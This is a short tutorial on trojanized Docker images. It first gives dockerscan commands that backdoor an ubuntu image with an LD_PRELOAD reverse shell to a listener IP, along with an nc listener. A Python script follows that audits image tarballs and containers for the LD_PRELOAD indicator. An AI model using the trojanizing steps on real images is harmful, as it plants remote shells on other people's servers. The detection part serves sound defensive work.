Trojanized Docker image with dockerscan tool

Over the past year, 17 backdoored Docker images were identified and removed from Docker Hub. These malicious images, uploaded under the pseudonym “docker123321,” were used to install reverse shells and cryptocurrency miners on users’ servers. The images were available on Docker Hub between May 2017 and May 2018 before they were taken down. This situation highlights the importance of vigilance and the need for security measures when pulling Docker images from public repositories. (The New Stack)

Download and install DockerScan

git clone https://github.com/cr0hn/dockerscan
cd dockerscan
sudo python3.6 setup.py install


Create Reverse shell with LD_PRELOAD *trick*

mkdir backdoor && cd backdoor
docker pull ubuntu:latest
docker save ubuntu:latest -o ubuntu-original
export LC_ALL=C.UTF-8
export LANG=C.UTF-8

dockerscan image modify trojanize ubuntu-original <listener_ip> -p 45678 -o ubuntu-trojanized
docker load -i ubuntu-trojanized.tar


Set up Remote Listener and deploy image

remote_server> nc -l 45678


docker run -d ubuntu-trojanized
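From the defender's side, the indicator this LD_PRELOAD trick leaves behind is visible both in the saved image (the `ubuntu-trojanized.tar` produced above) and in the running container: an `LD_PRELOAD` variable baked into the image config, or an `etc/ld.so.preload` file written by a layer, plus a shared object dropped outside the normal library directories. The Python script below is an added example, not part of the original note or of the dockerscan project. It audits a `docker save` tarball offline before `docker load`, and checks `docker inspect` output for the same variable on a running container. The two in-memory sample images, the `/usr/share/lib/libexample.so` path and the container name `/quiet_ubuntu` are constructed for the demonstration and are not dockerscan's own values.

```python
"""Audit a `docker save` tarball, or `docker inspect` output, for LD_PRELOAD injection.
Added defender-side example; the sample images and paths below are constructed
for the demonstration and are not taken from dockerscan."""
import io
import json
import sys
import tarfile

PRELOAD_FILE = "etc/ld.so.preload"
# Where shared objects normally live in a Debian/Ubuntu base image (heuristic).
STANDARD_LIB_DIRS = ("lib/", "lib64/", "usr/lib/", "usr/lib64/", "usr/local/lib/")


def _env_findings(env):
    """Return every LD_PRELOAD entry in an image or container Env list."""
    return [e for e in (env or []) if e.startswith("LD_PRELOAD=")]


def _normalize(path):
    """Strip the './' and leading '/' that layer tars use, so paths compare cleanly."""
    if path.startswith("./"):
        path = path[2:]
    return path.lstrip("/")


def audit_image_tar(data):
    """Inspect a docker-save tarball held in memory. Returns a dict with
    ld_preload_env (config Env hits), preload_files (layers writing /etc/ld.so.preload),
    shared_objects (.so files outside STANDARD_LIB_DIRS, informational) and suspicious."""
    findings = {"ld_preload_env": [], "preload_files": [], "shared_objects": []}
    with tarfile.open(fileobj=io.BytesIO(data)) as image:
        manifest = json.load(image.extractfile("manifest.json"))
        for entry in manifest:
            config = json.load(image.extractfile(entry["Config"]))
            findings["ld_preload_env"] += _env_findings(config.get("config", {}).get("Env"))
            for layer_name in entry["Layers"]:
                layer_bytes = image.extractfile(layer_name).read()
                with tarfile.open(fileobj=io.BytesIO(layer_bytes)) as layer:
                    for member in layer.getmembers():
                        path = _normalize(member.name)
                        basename = path.rsplit("/", 1)[-1]
                        if path == PRELOAD_FILE:
                            findings["preload_files"].append(f"{layer_name}:{path}")
                        elif ".so" in basename and not path.startswith(STANDARD_LIB_DIRS):
                            findings["shared_objects"].append(f"{layer_name}:{path}")
    # A preload variable or preload file is a hard indicator; stray .so files are only a hint.
    findings["suspicious"] = bool(findings["ld_preload_env"] or findings["preload_files"])
    return findings


def audit_inspect_output(inspect_json):
    """Check `docker inspect <container>` JSON for LD_PRELOAD in each container's Config.Env."""
    return [f"{c.get('Name', '?')}: {e}"
            for c in json.loads(inspect_json)
            for e in _env_findings(c.get("Config", {}).get("Env"))]


def build_sample_image(env, layer_files):
    """Build a minimal docker-save style tarball in memory (constructed test data):
    manifest.json, one config JSON and one layer tar."""
    def add_bytes(tar, name, payload):
        info = tarfile.TarInfo(name)
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))

    layer_buf = io.BytesIO()
    with tarfile.open(fileobj=layer_buf, mode="w") as layer:
        for path, content in layer_files.items():
            add_bytes(layer, path, content)
    config = {"architecture": "amd64", "config": {"Env": env, "Cmd": ["/bin/bash"]}}
    manifest = [{"Config": "config.json", "RepoTags": ["sample:latest"], "Layers": ["layer.tar"]}]
    image_buf = io.BytesIO()
    with tarfile.open(fileobj=image_buf, mode="w") as image:
        add_bytes(image, "manifest.json", json.dumps(manifest).encode())
        add_bytes(image, "config.json", json.dumps(config).encode())
        add_bytes(image, "layer.tar", layer_buf.getvalue())
    return image_buf.getvalue()


# Constructed samples: a clean base image and one carrying the preload indicator.
BASE_ENV = ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"]
CLEAN_IMAGE = build_sample_image(
    BASE_ENV, {"etc/hostname": b"sample\n", "usr/lib/x86_64-linux-gnu/libc.so.6": b"\x7fELF"})
INJECTED_IMAGE = build_sample_image(
    BASE_ENV + ["LD_PRELOAD=/usr/share/lib/libexample.so"],  # placeholder path, not dockerscan's
    {"etc/hostname": b"sample\n", "usr/share/lib/libexample.so": b"\x7fELF"})
SAMPLE_INSPECT = json.dumps([{"Name": "/quiet_ubuntu",  # constructed container name
                              "Config": {"Env": BASE_ENV + ["LD_PRELOAD=/usr/share/lib/libexample.so"]}}])

if __name__ == "__main__":
    # Usage: python3 audit_image.py ubuntu-trojanized.tar   (a real docker-save file)
    # With no argument the constructed samples above are audited instead.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print(json.dumps(audit_image_tar(fh.read()), indent=2))
    else:
        for label, blob in (("clean", CLEAN_IMAGE), ("injected", INJECTED_IMAGE)):
            print(label, json.dumps(audit_image_tar(blob), indent=2))
        print(audit_inspect_output(SAMPLE_INSPECT))
```

Run it against the tarball before `docker load`, and feed `docker inspect <container>` output to `audit_inspect_output` for containers already running; an `LD_PRELOAD` entry in a base image's config has no legitimate reason to be there and is worth treating as a hard finding, while the `.so`-outside-lib list is only a pointer to which layer to diff against the original `docker save` output.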